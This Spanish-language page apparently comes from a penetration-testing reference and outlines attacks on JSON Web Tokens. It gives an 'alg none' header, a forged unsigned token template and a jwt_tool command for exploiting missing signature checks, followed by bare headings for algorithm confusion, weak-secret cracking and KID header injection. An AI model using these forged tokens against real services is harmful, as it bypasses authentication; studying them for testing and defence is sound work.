JSON Web Token (JWT)
Sin verificación de firma
Algoritmo none
none# JSON header
{"alg":"none","typ":"JWT"}
# JWT
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.base64UrlEncode(payload).
# JWT Tool
jwt_tool.py -X a <jwt>Confusión de algoritmo
Secreto débil
Ataque de diccionario
Ataque de fuerza bruta
Inyecciones en parámetros de encabezado
KID
Otros claims
JWT Tool
Última actualización